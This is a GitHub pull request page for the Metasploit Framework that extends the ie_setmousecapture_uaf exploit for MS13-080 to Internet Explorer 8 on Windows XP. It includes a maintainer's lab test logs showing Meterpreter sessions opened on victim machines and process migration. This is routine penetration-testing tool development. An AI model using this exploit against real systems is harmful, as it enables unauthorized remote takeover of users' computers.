Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

win XP IE8 exploit for MS13-080 #4213

Merged
merged 2 commits into from Dec 3, 2014
Merged

Conversation

@webstersprodigy
Copy link
Contributor

@webstersprodigy webstersprodigy commented Nov 15, 2014

ie_setmousecapture_uaf only supported IE9 on windows 7, but the vuln was present in different versions of IE. I tested with Windows xp sp3 and IE8 and the exploit works pretty reliably (included the specific mshtml version in the code). I did not test that I did not break the win7 IE9 exploit as I didn't have that setup (but there shouldn't be anything changed)

This pull request is probably not very useful in real life - I was just messing around.

@wchen-r7 wchen-r7 added the module label Nov 16, 2014
@wchen-r7 wchen-r7 self-assigned this Nov 16, 2014
@todb-r7 todb-r7 added the feature label Nov 17, 2014
@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Nov 22, 2014

I have not forgotten this PR. Want to do this but occupied with other stuff atm.

@wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Dec 3, 2014

Tested:

IE9:

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://0.0.0.0:8080/mtAFOHcX6lJL
[*]  Local IP: http://10.6.0.118:8080/mtAFOHcX6lJL
[*] Server started.
[*] 10.6.0.209       ie_setmousecapture_uaf - Gathering target information.
[*] 10.6.0.209       ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 10.6.0.209
[*] Meterpreter session 1 opened (10.6.0.118:4444 -> 10.6.0.209:49203) at 2014-12-03 13:43:56 -0600
[*] Session ID 1 (10.6.0.118:4444 -> 10.6.0.209:49203) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (2420)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1088
[+] Successfully migrated to process 

msf exploit(ie_setmousecapture_uaf) >

IE8 (XP):

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://172.16.23.1:8080/AcUinEiHgAWdsWM
[*] Server started.
[*] 172.16.23.129    ie_setmousecapture_uaf - Gathering target information.
[*] 172.16.23.129    ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 172.16.23.129
[*] Meterpreter session 3 opened (172.16.23.1:4444 -> 172.16.23.129:1951) at 2014-12-03 14:10:42 -0600
[*] Session ID 3 (172.16.23.1:4444 -> 172.16.23.129:1951) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2252
[+] Successfully migrated to process 
wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this pull request Dec 3, 2014
Conflicts:
	modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@wchen-r7 wchen-r7 merged commit 27d5ed6 into rapid7:master Dec 3, 2014
1 check passed
1 check passed
continuous-integration/travis-ci The Travis CI build passed
Details
wchen-r7 added a commit that referenced this pull request Dec 3, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can’t perform that action at this time.